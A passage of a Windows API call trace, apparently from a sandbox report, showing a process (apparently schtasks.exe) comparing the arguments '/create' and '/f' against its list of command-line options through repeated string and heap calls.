[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305c90) returned 0x74e
[0169.591] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90 | out: hHeap=0x2f0000) returned 1
[0169.591] SetLastError (dwErrCode=0x0)
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="create") returned 6
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="?") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="s") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="u") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="p") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="ru") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="rp") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="sc") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="mo") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="d") returned 1
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="m") returned 1
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="i") returned 1
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="tn") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="tr") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="st") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="sd") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="ed") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="it") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="et") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="k") returned 1
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="du") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="ri") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="z") returned 1
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="f") returned 1
[0169.593] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="v1") returned 2
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="xml") returned 3
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="ec") returned 2
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="rl") returned 2
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="delay") returned 5
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="np") returned 2
[0169.594] SetLastError (dwErrCode=0x0)
[0169.594] SetLastError (dwErrCode=0x0)
[0169.594] lstrlenW (lpString="/create") returned 7
[0169.594] lstrlenW (lpString="-/") returned 2
[0169.594] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.594] lstrlenW (lpString="create") returned 6
[0169.594] lstrlenW (lpString="create") returned 6
[0169.594] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.594] lstrlenW (lpString="create") returned 6
[0169.595] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.595] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.595] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.595] lstrlenW (lpString="|create|") returned 8
[0169.595] lstrlenW (lpString="|create|") returned 8
[0169.595] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0169.595] SetLastError (dwErrCode=0x0)
[0169.595] SetLastError (dwErrCode=0x0)
[0169.595] SetLastError (dwErrCode=0x0)
[0169.595] lstrlenW (lpString="/f") returned 2
[0169.595] lstrlenW (lpString="-/") returned 2
[0169.595] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.595] lstrlenW (lpString="create") returned 6
[0169.595] lstrlenW (lpString="create") returned 6
[0169.595] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] lstrlenW (lpString="f") returned 1
[0169.596] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.596] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.596] lstrlenW (lpString="|create|") returned 8
[0169.596] lstrlenW (lpString="|f|") returned 3
[0169.596] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0169.596] SetLastError (dwErrCode=0x490)
[0169.596] lstrlenW (lpString="?") returned 1
[0169.596] lstrlenW (lpString="?") returned 1
[0169.596] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] lstrlenW (lpString="f") returned 1
[0169.596] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|?|") returned 3
[0169.596] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.596] lstrlenW (lpString="|?|") returned 3
[0169.596] lstrlenW (lpString="|f|") returned 3
[0169.596] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0169.596] SetLastError (dwErrCode=0x490)
[0169.596] lstrlenW (lpString="s") returned 1
[0169.596] lstrlenW (lpString="s") returned 1
[0169.596] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] lstrlenW (lpString="f") returned 1
[0169.597] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|s|") returned 3
[0169.597] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.597] lstrlenW (lpString="|s|") returned 3
[0169.597] lstrlenW (lpString="|f|") returned 3
[0169.597] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0169.597] SetLastError (dwErrCode=0x490)
[0169.597] lstrlenW (lpString="u") returned 1
[0169.597] lstrlenW (lpString="u") returned 1
[0169.597] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] lstrlenW (lpString="f") returned 1
[0169.597] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|u|") returned 3
[0169.597] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.597] lstrlenW (lpString="|u|") returned 3
[0169.597] lstrlenW (lpString="|f|") returned 3
[0169.597] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0169.597] SetLastError (dwErrCode=0x490)
[0169.597] lstrlenW (lpString="p") returned 1
[0169.597] lstrlenW (lpString="p") returned 1
[0169.597] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] lstrlenW (lpString="f") returned 1
[0169.598] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|p|") returned 3
[0169.598] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.598] lstrlenW (lpString="|p|") returned 3
[0169.598] lstrlenW (lpString="|f|") returned 3
[0169.598] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0169.598] SetLastError (dwErrCode=0x490)
[0169.598] lstrlenW (lpString="ru") returned 2
[0169.598] lstrlenW (lpString="ru") returned 2
[0169.598] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] lstrlenW (lpString="f") returned 1
[0169.598] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ru|") returned 4
[0169.598] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.598] lstrlenW (lpString="|ru|") returned 4
[0169.598] lstrlenW (lpString="|f|") returned 3
[0169.598] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0
[0169.598] SetLastError (dwErrCode=0x490)
[0169.598] lstrlenW (lpString="rp") returned 2
[0169.598] lstrlenW (lpString="rp") returned 2
[0169.598] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] lstrlenW (lpString="f") returned 1
[0169.598] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|rp|") returned 4
[0169.599] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.599] lstrlenW (lpString="|rp|") returned 4
[0169.599] lstrlenW (lpString="|f|") returned 3
[0169.599] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0
[0169.599] SetLastError (dwErrCode=0x490)
[0169.599] lstrlenW (lpString="sc") returned 2
[0169.599] lstrlenW (lpString="sc") returned 2
[0169.599] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] lstrlenW (lpString="f") returned 1
[0169.599] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sc|") returned 4
[0169.599] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.599] lstrlenW (lpString="|sc|") returned 4
[0169.599] lstrlenW (lpString="|f|") returned 3
[0169.599] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0
[0169.599] SetLastError (dwErrCode=0x490)
[0169.599] lstrlenW (lpString="mo") returned 2
[0169.599] lstrlenW (lpString="mo") returned 2
[0169.599] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] lstrlenW (lpString="f") returned 1
[0169.599] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|mo|") returned 4
[0169.600] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.600] lstrlenW (lpString="|mo|") returned 4
[0169.600] lstrlenW (lpString="|f|") returned 3
[0169.600] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0
[0169.600] SetLastError (dwErrCode=0x490)
[0169.600] lstrlenW (lpString="d") returned 1
[0169.600] lstrlenW (lpString="d") returned 1
[0169.600] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.600] lstrlenW (lpString="f") returned 1
[0169.600] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.600] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|d|") returned 3
[0169.600] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.600] lstrlenW (lpString="|d|") returned 3
[0169.600] lstrlenW (lpString="|f|") returned 3
[0169.600] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0
[0169.600] SetLastError (dwErrCode=0x490)
[0169.600] lstrlenW (lpString="m") returned 1
[0169.600] lstrlenW (lpString="m") returned 1
[0169.600] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] lstrlenW (lpString="f") returned 1
[0169.601] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|m|") returned 3
[0169.601] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.601] lstrlenW (lpString="|m|") returned 3
[0169.601] lstrlenW (lpString="|f|") returned 3
[0169.601] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0
[0169.601] SetLastError (dwErrCode=0x490)
[0169.601] lstrlenW (lpString="i") returned 1
[0169.601] lstrlenW (lpString="i") returned 1
[0169.601] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] lstrlenW (lpString="f") returned 1
[0169.601] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|i|") returned 3
[0169.601] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.601] lstrlenW (lpString="|i|") returned 3
[0169.601] lstrlenW (lpString="|f|") returned 3
[0169.601] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0
[0169.601] SetLastError (dwErrCode=0x490)
[0169.601] lstrlenW (lpString="tn") returned 2
[0169.601] lstrlenW (lpString="tn") returned 2
[0169.602] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] lstrlenW (lpString="f") returned 1
[0169.602] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.602] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.602] lstrlenW (lpString="|tn|") returned 4
[0169.602] lstrlenW (lpString="|f|") returned 3
[0169.602] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0169.602] SetLastError (dwErrCode=0x490)
[0169.602] lstrlenW (lpString="tr") returned 2
[0169.602] lstrlenW (lpString="tr") returned 2
[0169.602] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] lstrlenW (lpString="f") returned 1
[0169.602] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tr|") returned 4
[0169.602] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.602] lstrlenW (lpString="|tr|") returned 4
[0169.602] lstrlenW (lpString="|f|") returned 3
[0169.602] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0
[0169.602] SetLastError (dwErrCode=0x490)
[0169.602] lstrlenW (lpString="st") returned 2
[0169.602] lstrlenW (lpString="st") returned 2
[0169.602] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] lstrlenW (lpString="f") returned 1
[0169.603] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|st|") returned 4
[0169.603] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.603] lstrlenW (lpString="|st|") returned 4
[0169.603] lstrlenW (lpString="|f|") returned 3
[0169.603] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0
[0169.603] SetLastError (dwErrCode=0x490)
[0169.603] lstrlenW (lpString="sd") returned 2
[0169.603] lstrlenW (lpString="sd") returned 2
[0169.603] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] lstrlenW (lpString="f") returned 1
[0169.603] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sd|") returned 4
[0169.603] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.603] lstrlenW (lpString="|sd|") returned 4
[0169.603] lstrlenW (lpString="|f|") returned 3
[0169.603] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0
[0169.603] SetLastError (dwErrCode=0x490)
[0169.603] lstrlenW (lpString="ed") returned 2
[0169.603] lstrlenW (lpString="ed") returned 2
[0169.603] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] lstrlenW (lpString="f") returned 1
[0169.603] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ed|") returned 4
[0169.604] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.604] lstrlenW (lpString="|ed|") returned 4
[0169.604] lstrlenW (lpString="|f|") returned 3
[0169.604] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0
[0169.604] SetLastError (dwErrCode=0x490)
[0169.604] lstrlenW (lpString="it") returned 2
[0169.604] lstrlenW (lpString="it") returned 2
[0169.604] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] lstrlenW (lpString="f") returned 1
[0169.604] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|it|") returned 4
[0169.604] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.604] lstrlenW (lpString="|it|") returned 4
[0169.604] lstrlenW (lpString="|f|") returned 3
[0169.604] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0
[0169.604] SetLastError (dwErrCode=0x490)
[0169.604] lstrlenW (lpString="et") returned 2
[0169.604] lstrlenW (lpString="et") returned 2
[0169.604] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] lstrlenW (lpString="f") returned 1
[0169.604] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|et|") returned 4
[0169.605] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.605] lstrlenW (lpString="|et|") returned 4
[0169.605] lstrlenW (lpString="|f|") returned 3
[0169.605] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0
[0169.605] SetLastError (dwErrCode=0x490)
[0169.605] lstrlenW (lpString="k") returned 1
[0169.605] lstrlenW (lpString="k") returned 1
[0169.605] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] lstrlenW (lpString="f") returned 1
[0169.605] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|k|") returned 3
[0169.605] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.605] lstrlenW (lpString="|k|") returned 3
[0169.605] lstrlenW (lpString="|f|") returned 3
[0169.605] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0
[0169.605] SetLastError (dwErrCode=0x490)
[0169.605] lstrlenW (lpString="du") returned 2
[0169.605] lstrlenW (lpString="du") returned 2
[0169.605] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] lstrlenW (lpString="f") returned 1
[0169.605] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|du|") returned 4
[0169.605] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.605] lstrlenW (lpString="|du|") returned 4
[0169.605] lstrlenW (lpString="|f|") returned 3
[0169.605] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0
[0169.606] SetLastError (dwErrCode=0x490)
[0169.606] lstrlenW (lpString="ri") returned 2
[0169.606] lstrlenW (lpString="ri") returned 2
[0169.606] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ri|") returned 4
[0169.606] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.606] lstrlenW (lpString="|ri|") returned 4
[0169.606] lstrlenW (lpString="|f|") returned 3
[0169.606] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0
[0169.606] SetLastError (dwErrCode=0x490)
[0169.606] lstrlenW (lpString="z") returned 1
[0169.606] lstrlenW (lpString="z") returned 1
[0169.606] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|z|") returned 3
